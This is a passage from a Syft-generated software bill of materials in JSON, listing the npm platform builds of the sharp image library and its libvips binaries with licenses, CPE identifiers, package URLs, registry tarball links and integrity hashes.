BqhveVHonrHJ9/+k89qbLl0bcJns+e4t4rvaNBxaEZsFtSfAdquPrw==","dependencies":null}},{"id":"67f7722888e07f97","name":"@img/sharp-libvips-linuxmusl-arm64","version":"1.2.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"LGPL-3.0-or-later","spdxExpression":"LGPL-3.0-or-later","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linuxmusl-arm64:\\@img\\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linuxmusl-arm64:\\@img\\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linuxmusl_arm64:\\@img\\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linuxmusl_arm64:\\@img\\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linuxmusl:\\@img\\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linuxmusl:\\@img\\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linuxmusl:\\@img\\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linuxmusl:\\@img\\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/sharp-libvips-linuxmusl-arm64@1.2.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/sharp-libvips-linuxmusl-arm64/-/sharp-libvips-linuxmusl-arm64-1.2.4.tgz","integrity":"sha512-FVQHuwx1IIuNow9QAbYUzJ+En8KcVm9Lk5+uGUQJHaZmMECZmOlix9HnH7n1TRkXMS0pGxIJokIVB9SuqZGGXw==","dependencies":null}},{"id":"61da63d4bf468c4d","name":"@img/sharp-libvips-linuxmusl-x64","version":"1.2.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"LGPL-3.0-or-later","spdxExpression":"LGPL-3.0-or-later","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linuxmusl-x64:\\@img\\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linuxmusl-x64:\\@img\\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linuxmusl_x64:\\@img\\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linuxmusl_x64:\\@img\\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linuxmusl:\\@img\\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips-linuxmusl:\\@img\\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linuxmusl:\\@img\\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips_linuxmusl:\\@img\\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-libvips:\\@img\\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_libvips:\\@img\\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/sharp-libvips-linuxmusl-x64@1.2.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/sharp-libvips-linuxmusl-x64/-/sharp-libvips-linuxmusl-x64-1.2.4.tgz","integrity":"sha512-+LpyBk7L44ZIXwz/VYfglaX/okxezESc6UxDSoyo2Ks6Jxc4Y7sGjpgU9s4PMgqgjj1gZCylTieNamqA1MF7Dg==","dependencies":null}},{"id":"dcf7df343a75d233","name":"@img/sharp-linux-arm","version":"0.34.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/sharp-linux-arm:\\@img\\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-linux-arm:\\@img\\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linux_arm:\\@img\\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linux_arm:\\@img\\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/sharp-linux-arm@0.34.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/sharp-linux-arm/-/sharp-linux-arm-0.34.5.tgz","integrity":"sha512-9dLqsvwtg1uuXBGZKsxem9595+ujv0sJ6Vi8wcTANSFpwV/GONat5eCkzQo/1O6zRIkh0m/8+5BjrRr7jDUSZw==","dependencies":null}},{"id":"fd64c295f8bc0b6a","name":"@img/sharp-linux-arm64","version":"0.34.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/sharp-linux-arm64:\\@img\\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-linux-arm64:\\@img\\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linux_arm64:\\@img\\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linux_arm64:\\@img\\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/sharp-linux-arm64@0.34.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/sharp-linux-arm64/-/sharp-linux-arm64-0.34.5.tgz","integrity":"sha512-bKQzaJRY/bkPOXyKx5EVup7qkaojECG6NLYswgktOZjaXecSAeCWiZwwiFf3/Y+O1HrauiE3FVsGxFg8c24rZg==","dependencies":null}},{"id":"3b1510e0e0b839b3","name":"@img/sharp-linux-ppc64","version":"0.34.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/sharp-linux-ppc64:\\@img\\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-linux-ppc64:\\@img\\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linux_ppc64:\\@img\\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linux_ppc64:\\@img\\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/sharp-linux-ppc64@0.34.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/sharp-linux-ppc64/-/sharp-linux-ppc64-0.34.5.tgz","integrity":"sha512-7zznwNaqW6YtsfrGGDA6BRkISKAAE1Jo0QdpNYXNMHu2+0dTrPflTLNkpc8l7MUP5M16ZJcUvysVWWrMefZquA==","dependencies":null}},{"id":"523b83e120964834","name":"@img/sharp-linux-riscv64","version":"0.34.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/sharp-linux-riscv64:\\@img\\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-linux-riscv64:\\@img\\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linux_riscv64:\\@img\\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linux_riscv64:\\@img\\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/sharp-linux-riscv64@0.34.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/sharp-linux-riscv64/-/sharp-linux-riscv64-0.34.5.tgz","integrity":"sha512-51gJuLPTKa7piYPaVs8GmByo7/U7/7TZOq+cnXJIHZKavIRHAP77e3N2HEl3dgiqdD/w0yUfiJnII77PuDDFdw==","dependencies":null}},{"id":"cdcec5be4d61926b","name":"@img/sharp-linux-s390x","version":"0.34.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/sharp-linux-s390x:\\@img\\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-linux-s390x:\\@img\\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linux_s390x:\\@img\\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linux_s390x:\\@img\\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/sharp-linux-s390x@0.34.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/sharp-linux-s390x/-/sharp-linux-s390x-0.34.5.tgz","integrity":"sha512-nQtCk0PdKfho3eC5MrbQoigJ2gd1CgddUMkabUj+rBevs8tZ2cULOx46E7oyX+04WGfABgIwmMC0VqieTiR4jg==","dependencies":null}},{"id":"8ea3a106d5c8d10b","name":"@img/sharp-linux-x64","version":"0.34.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/sharp-linux-x64:\\@img\\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-linux-x64:\\@img\\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linux_x64:\\@img\\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linux_x64:\\@img\\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/sharp-linux-x64@0.34.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/sharp-linux-x64/-/sharp-linux-x64-0.34.5.tgz","integrity":"sha512-MEzd8HPKxVxVenwAa+JRPwEC7QFjoPWuS5NZnBt6B3pu7EG2Ge0id1oLHZpPJdn3OQK+BQDiw9zStiHBTJQQQQ==","dependencies":null}},{"id":"c5d74af075cbec8c","name":"@img/sharp-linuxmusl-arm64","version":"0.34.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/sharp-linuxmusl-arm64:\\@img\\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-linuxmusl-arm64:\\@img\\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linuxmusl_arm64:\\@img\\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linuxmusl_arm64:\\@img\\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-linuxmusl:\\@img\\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-linuxmusl:\\@img\\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linuxmusl:\\@img\\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linuxmusl:\\@img\\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/sharp-linuxmusl-arm64@0.34.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/sharp-linuxmusl-arm64/-/sharp-linuxmusl-arm64-0.34.5.tgz","integrity":"sha512-fprJR6GtRsMt6Kyfq44IsChVZeGN97gTD331weR1ex1c1rypDEABN6Tm2xa1wE6lYb5DdEnk03NZPqA7Id21yg==","dependencies":null}},{"id":"26c07c454ffe91ee","name":"@img/sharp-linuxmusl-x64","version":"0.34.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/sharp-linuxmusl-x64:\\@img\\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-linuxmusl-x64:\\@img\\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linuxmusl_x64:\\@img\\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linuxmusl_x64:\\@img\\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-linuxmusl:\\@img\\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-linuxmusl:\\@img\\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linuxmusl:\\@img\\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_linuxmusl:\\@img\\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/sharp-linuxmusl-x64@0.34.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/sharp-linuxmusl-x64/-/sharp-linuxmusl-x64-0.34.5.tgz","integrity":"sha512-Jg8wNT1MUzIvhBFxViqrEhWDGzqymo3sV7z7ZsaWbZNDLXRJZoRGrjulp60YYtV4wfY8VIKcWidjojlLcWrd8Q==","dependencies":null}},{"id":"ef4974ec29f2dcac","name":"@img/sharp-wasm32","version":"0.34.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0 AND LGPL-3.0-or-later AND MIT","spdxExpression":"Apache-2.0 AND LGPL-3.0-or-later AND MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@img\\/sharp-wasm32:\\@img\\/sharp-wasm32:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp-wasm32:\\@img\\/sharp_wasm32:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_wasm32:\\@img\\/sharp-wasm32:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp_wasm32:\\@img\\/sharp_wasm32:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-wasm32:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_wasm32:0.34.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40img/sharp-wasm32@0.34.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@img/sharp-wasm32/-/sharp-wasm32-0.34.5.tgz","integrity":"sha512-OdWTEiVkY2PHwqkbBI8frFxQQFekHaSSkUIJkwzclWZe64O1X4UlUjqqqLaPbUpMOQk6FBu/HtlGXNblIs0huw==","dependencies":{"@emnapi/runtime":"^1.7.0"}}},{"id":"b108eb8ed0a59806","name":"@img/sharp-win32-arm64","version":"0.34.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0 AND LGPL-3.0-or-later","spdxExpression":"Apache-2.0 AND 